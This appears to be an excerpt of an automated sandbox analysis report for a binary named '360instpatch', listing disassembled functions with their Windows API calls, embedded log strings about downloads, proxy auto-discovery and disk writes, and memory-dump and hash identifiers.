                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2699195558-0
                                                                                                                                                                                                              • Opcode ID: 44492a33a680f0e936d9867719593487a38b1434ebcecfa68bb5f531423ac779
                                                                                                                                                                                                              • Instruction ID: fef9c930bf21c55256d92b43a4cd24ef183e2dc1626daee70b345c0a30ce88bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44492a33a680f0e936d9867719593487a38b1434ebcecfa68bb5f531423ac779
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47A1D0736046269FDB40DAB8C994B2EB7B5BF45710F10829AE905D76B1D7BCD840CBD0
                                                                                                                                                                                                              Function 6BF18BCB Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 219networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?), ref: 6BF18E00
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF18E5B
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF18E63
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF18E6B
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: _memset.LIBCMT ref: 6BF23FAF
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF23FCA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.%3d] %s(%s) closed, error code %d, api %d, state %d, downloaded %I64d, %d ms, xrefs: 6BF18E1B
                                                                                                                                                                                                              • [%d.%3d] OnClose_Receive Date tail_len = %d, xrefs: 6BF18CA8
                                                                                                                                                                                                              • [%d.%3d] OnClose HttpBlock RangeFrom = %I64u BodyDownload = %I64u, xrefs: 6BF18D69
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$ErrorLast_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [%d.%3d] OnClose HttpBlock RangeFrom = %I64u BodyDownload = %I64u$[%d.%3d] OnClose_Receive Date tail_len = %d$[%d.%3d] %s(%s) closed, error code %d, api %d, state %d, downloaded %I64d, %d ms
                                                                                                                                                                                                              • API String ID: 1507222378-1900711150
                                                                                                                                                                                                              • Opcode ID: 56da1fc103e5fa293384a50a5ba16e4a755011e8874cfd56d33701c30b2328fb
                                                                                                                                                                                                              • Instruction ID: f02bf6cb322b95fb7f47a6caf56a99343f1adb6901393a0648aacf716f5f1726
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56da1fc103e5fa293384a50a5ba16e4a755011e8874cfd56d33701c30b2328fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72914972604B05AFE725DFB4C994BDBB7E6FB58304F00481DE66A97260DB38B904CB61
                                                                                                                                                                                                              Function 6BF03AC3 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 155COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF03AE2
                                                                                                                                                                                                                • Part of subcall function 6BF1BFAE: __EH_prolog3.LIBCMT ref: 6BF1BFB5
                                                                                                                                                                                                                • Part of subcall function 6BF1BFAE: _memset.LIBCMT ref: 6BF1C152
                                                                                                                                                                                                                • Part of subcall function 6BF1998E: __EH_prolog3.LIBCMT ref: 6BF19995
                                                                                                                                                                                                                • Part of subcall function 6BEE8514: char_traits.LIBCPMT ref: 6BEE8539
                                                                                                                                                                                                                • Part of subcall function 6BF16CA0: htons.WS2_32(?), ref: 6BF16CE0
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF03C4A
                                                                                                                                                                                                                • Part of subcall function 6BF240CF: _memset.LIBCMT ref: 6BF24102
                                                                                                                                                                                                                • Part of subcall function 6BF240CF: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF2411D
                                                                                                                                                                                                                • Part of subcall function 6BF19E9E: _memset.LIBCMT ref: 6BF19FC9
                                                                                                                                                                                                                • Part of subcall function 6BF1B0FA: __EH_prolog3.LIBCMT ref: 6BF1B101
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ConnetPacServer AsyncStartDownload fail, xrefs: 6BF03B47
                                                                                                                                                                                                              • ConnetPacServer dataLen is Err!, xrefs: 6BF03C73
                                                                                                                                                                                                              • ConnetPacServer code:%d, xrefs: 6BF03C08
                                                                                                                                                                                                              • ConnetPacServer ok!, xrefs: 6BF03C6C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_memset$char_traitshtonswvnsprintf
                                                                                                                                                                                                              • String ID: ConnetPacServer AsyncStartDownload fail$ConnetPacServer code:%d$ConnetPacServer dataLen is Err!$ConnetPacServer ok!
                                                                                                                                                                                                              • API String ID: 2665625422-3491224597
                                                                                                                                                                                                              • Opcode ID: a9dcdf7fca80c0c200c3b658ad3f264d343d0b993a3cfcf1c24b5fd1e05b4071
                                                                                                                                                                                                              • Instruction ID: 3cb12c40539c8601e5a21235769f40423224440023a2d7934b2b5ad5ce9bced2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9dcdf7fca80c0c200c3b658ad3f264d343d0b993a3cfcf1c24b5fd1e05b4071
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D51707390414AAFDB14DFB4CCA1DEE73B8FF18248F104419E916A61B1EF399A05DA61
                                                                                                                                                                                                              Function 00B92420 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B22750: _vswprintf_s.LIBCMT ref: 00B22783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,00BFCDA4,?,?), ref: 00B92492
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B924BF
                                                                                                                                                                                                              • _strncpy.LIBCMT ref: 00B924FB
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00B92531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B9259B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset_strncpy_vswprintf_s
                                                                                                                                                                                                              • String ID: SCSIDISK$\\.\Scsi%d:
                                                                                                                                                                                                              • API String ID: 170396225-2176293039
                                                                                                                                                                                                              • Opcode ID: 89173b295b6390cd9450748a9bc99e3a4313f5762a0e5915804cd8832c3466e8
                                                                                                                                                                                                              • Instruction ID: 1b7c775079b1481cd917be12c244494d54f51ce41d13996310569cd79e6586ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89173b295b6390cd9450748a9bc99e3a4313f5762a0e5915804cd8832c3466e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D34191B4A48340ABE730DB14DC86FABB7D8EB98704F40096DF698972C1D7B5A508C757
                                                                                                                                                                                                              Function 00B80877 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B80896
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: _memset.LIBCMT ref: 00B7A71F
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: _memset.LIBCMT ref: 00B7A72D
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00B2BCDE), ref: 00B7A741
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: _memset.LIBCMT ref: 00B7A754
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: PathCombineW.SHLWAPI(?,?,?), ref: 00B7A784
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: _wcscat.LIBCMT ref: 00B7A796
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: PathFileExistsW.SHLWAPI(?), ref: 00B7A7A4
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000010), ref: 00B80903
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B8092F
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000400,00000000,?,?,?), ref: 00B80940
                                                                                                                                                                                                                • Part of subcall function 00B80691: __EH_prolog3.LIBCMT ref: 00B806B0
                                                                                                                                                                                                                • Part of subcall function 00B80691: PathFileExistsW.SHLWAPI(?,00000010), ref: 00B806CC
                                                                                                                                                                                                                • Part of subcall function 00B80691: _memset.LIBCMT ref: 00B8070A
                                                                                                                                                                                                                • Part of subcall function 00B80691: _memset.LIBCMT ref: 00B807B9
                                                                                                                                                                                                              • SHCreateDirectory.SHELL32(00000000,?,?,{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp,00000000,?,?,?), ref: 00B8096E
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B809A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp, xrefs: 00B80952
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Path$File$DeleteExistsH_prolog3Temp$CombineCreateDirectory_wcscat
                                                                                                                                                                                                              • String ID: {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp
                                                                                                                                                                                                              • API String ID: 3543345046-342223665
                                                                                                                                                                                                              • Opcode ID: a7dcefe587e449bd1e335862ebff75615a938c034be530a840809d1e681b2be8
                                                                                                                                                                                                              • Instruction ID: cd73decfd18c02f5e2678a238ece5c959b89950e4455c73a82d8595772af9054
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7dcefe587e449bd1e335862ebff75615a938c034be530a840809d1e681b2be8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42316D71A102199BDB54FBA4DC92AFEB7F8FF04304F0044A9E515A7291EF346A09CBA0
                                                                                                                                                                                                              Function 6BF02364 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6BF02387
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: __FF_MSGBANNER.LIBCMT ref: 6BF3858D
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: __NMSG_WRITE.LIBCMT ref: 6BF38594
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: RtlAllocateHeap.NTDLL(00000000,-0000000D,00000001,00000000,00000000,?,6BF42E8E,00000002,00000001,00000002,?,6BF3F8B1,00000018,6BF7C4F0,0000000C,6BF3F942), ref: 6BF385E1
                                                                                                                                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 6BF0239D
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6BF023B3
                                                                                                                                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 6BF023C8
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF023EF
                                                                                                                                                                                                              • __snwprintf.LIBCMT ref: 6BF02416
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: __lock.LIBCMT ref: 6BF389C3
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: ___sbh_find_block.LIBCMT ref: 6BF389CE
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: ___sbh_free_block.LIBCMT ref: 6BF389DD
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: HeapFree.KERNEL32(00000000,00000002,6BF7C288,0000000C,6BF3F908,00000000,6BF7C4F0,0000000C,6BF3F942,00000002,00000830,?,6BF47C19,00000004,6BF7C818,0000000C), ref: 6BF38A0D
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: GetLastError.KERNEL32(?,6BF47C19,00000004,6BF7C818,0000000C,6BF42ED8,00000002,0000083F,00000000,00000000,00000000,?,6BF3F137,00000001,00000214), ref: 6BF38A1E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • http://wpad.%s/wpad.dat, xrefs: 6BF0240D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapNetworkParams_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock__snwprintf_memset
                                                                                                                                                                                                              • String ID: http://wpad.%s/wpad.dat
                                                                                                                                                                                                              • API String ID: 2241623331-1081111291
                                                                                                                                                                                                              • Opcode ID: 091ffec2e46f53ba1c40dbe5b3fc4b7955a970aec6b3a3cc916f36612a5be726
                                                                                                                                                                                                              • Instruction ID: 4655d2a113c0a05f3942daf350a091bce0e36fd7dc64aaada7c0f7e9b5c7e44e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 091ffec2e46f53ba1c40dbe5b3fc4b7955a970aec6b3a3cc916f36612a5be726
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E21273790012ABAD702CB748C51EEEB3BCAF49B14F5040AAE508E3031EF7D9A8557B5
                                                                                                                                                                                                              Function 6BEEA365 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BEEA36C
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BEEA376
                                                                                                                                                                                                                • Part of subcall function 6BEFAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,6BF78AA8,00000018,6BF2E73E,00000000), ref: 6BEFAE6F
                                                                                                                                                                                                                • Part of subcall function 6BEE802B: WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BEE8033
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BEEA3A9
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BEEA3B3
                                                                                                                                                                                                                • Part of subcall function 6BEEA0F5: __EH_prolog3_GS.LIBCMT ref: 6BEEA0FC
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BEEA3C3
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: _memset.LIBCMT ref: 6BF24020
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 6BF2403B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [DiskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d., xrefs: 6BEEA3DC
                                                                                                                                                                                                              • p2sp.Disk, xrefs: 6BEEA371
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$CurrentDispatcherExceptionH_prolog3H_prolog3_ObjectSingleThreadUserWait_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [DiskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d.$p2sp.Disk
                                                                                                                                                                                                              • API String ID: 1914228569-2306218905
                                                                                                                                                                                                              • Opcode ID: 6cc952c3b3099df48130af7ab32dea5ee8aacc5ee6598501da0a096fa9c472de
                                                                                                                                                                                                              • Instruction ID: 50bf7dba989ab8402bf82a136b687b4c29094294d12e250e5e18b8cca421ee40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cc952c3b3099df48130af7ab32dea5ee8aacc5ee6598501da0a096fa9c472de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F111A073C10219AFDF40DBF4C944BEEB7B5BB08329F20415AE111E2190C779E6558BB2
                                                                                                                                                                                                              Function 6BEE789C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 6BEE78B6
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE78C7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE78CD
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6BEE78E9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE78FE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] __write_disk WriteFile fail, error code is %d, xrefs: 6BEE7904
                                                                                                                                                                                                              • [%d.] __write_disk SetFilePointer fail, error code is %d, xrefs: 6BEE78D3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$File$PointerWrite
                                                                                                                                                                                                              • String ID: [%d.] __write_disk SetFilePointer fail, error code is %d$[%d.] __write_disk WriteFile fail, error code is %d
                                                                                                                                                                                                              • API String ID: 3440492293-1343894148
                                                                                                                                                                                                              • Opcode ID: ca163ee8773178580c16955a931fc0360b074a102bcbe9f4e4e0d875a9d37814
                                                                                                                                                                                                              • Instruction ID: 7ae577cbde26f9473741e231190c9436e2f8c56e222010dba93d7155ee0f4de9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca163ee8773178580c16955a931fc0360b074a102bcbe9f4e4e0d875a9d37814
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8401DE33020209BBDF11AFA8CC00F9B3BA8EF55720F218565FA65C2160E736D921DB71
                                                                                                                                                                                                              Function 6BEE79BC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 6BEE79DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetFileValidData), ref: 6BEE79ED
                                                                                                                                                                                                              • SetFileValidData.KERNEL32(000000FF,?,?), ref: 6BEE7A00
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE7A06
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6BEE7A0F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$AddressDataErrorFileFreeLastLoadProcValid
                                                                                                                                                                                                              • String ID: Kernel32.dll$SetFileValidData
                                                                                                                                                                                                              • API String ID: 687652507-1252668126
                                                                                                                                                                                                              • Opcode ID: 8a82d0e48a2918e989d09cc541f099b6ecbd97ee36082cd292821e8d3111409a
                                                                                                                                                                                                              • Instruction ID: 098c5f339dc67352d7c9b1beb28a40113e5cb97256faa9856715316a36d8291e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a82d0e48a2918e989d09cc541f099b6ecbd97ee36082cd292821e8d3111409a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AF0C237100415EF9B526EA8CC048993B61EA812A8B348DA1F82CD3221D235C663C6B0
                                                                                                                                                                                                              Function 00B6639A Relevance: 12.2, APIs: 8, Instructions: 150windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B663B9
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00B663D8
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B663F9
                                                                                                                                                                                                              • GetWindowTextW.USER32(?,00000000,000003FF), ref: 00B6640D
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00B66434
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B66449
                                                                                                                                                                                                              • GetFocus.USER32 ref: 00B66488
                                                                                                                                                                                                              • SetFocus.USER32(?), ref: 00B664A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
